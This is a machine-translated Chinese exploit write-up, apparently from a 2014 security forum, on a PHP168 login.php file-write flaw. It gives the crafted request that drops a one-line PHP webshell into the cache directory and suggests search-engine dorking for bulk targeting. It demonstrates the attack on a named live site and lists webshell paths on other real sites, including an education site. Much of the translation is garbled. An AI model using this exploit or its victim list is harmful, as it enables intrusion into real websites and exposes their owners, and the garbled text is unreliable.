PHP168 6.0 and below the version login. php memory major security vulnerability-vulnerability warning-the black bar safety net

2014-03-30T00:00:00
ID MYHACK58:62201443769
Type myhack58
Reporter 佚名
Modified 2014-03-30T00:00:00

Description

A big problem, it is best not to ignore。。。。 The use of the code will be php Trojan is inserted into the cache/directory to easily get webshell, you can bulk.

Use a search engine to search

Powered by php168 v6 or what version of v5, v4, v3, v2, v1 will search to many, many more related site

Since the vulnerability is because of the login. php file for the variable filter is not strictly the cause, so we need to find ways to crack the password, but simply the hackers get the website webshell tool“word Trojan”is written to the website.

We are just looking for website testing

With the Texas Weather Service.

http://www.dzqxj.com/

In its name, add this code: login. php? makehtml=1&chdb[htmlname]=tick. php&chdb[path]=cache&content= in. This code means use of the login. php files will this code write to the site cache directory cache of the tick. php file.“ ”Is the word Trojan of the server.

那么 URL 就是 http://www.dzqxj.com/login.php it? makehtml=1&chdb[htmlname]=tick. php&chdb[path]=cache&content=

Then click Enter

If the jump to the login screen, then it may have been the Trojan is written to the cache directory.

这时 我们 进入 木马 地址 看看 http://www.dzqxj.com/cache/wooyun.php

OK, nothing is displayed on the description of the word Trojan is written successfully,we connect the tools to look at

To successfully take to the webshell

You can also directly Upload a Malaysian, I will not demo.

Other sites also exist in the vulnerability

And there's a lot government, education site。。。。

http://lib.xjau.edu.cn/cache/wooyun.php 密码*(do not publish)

http://www.stepdo.com/cache/wooyun.php 密码****(do not publish)

Vulnerability fix: upgrade the version.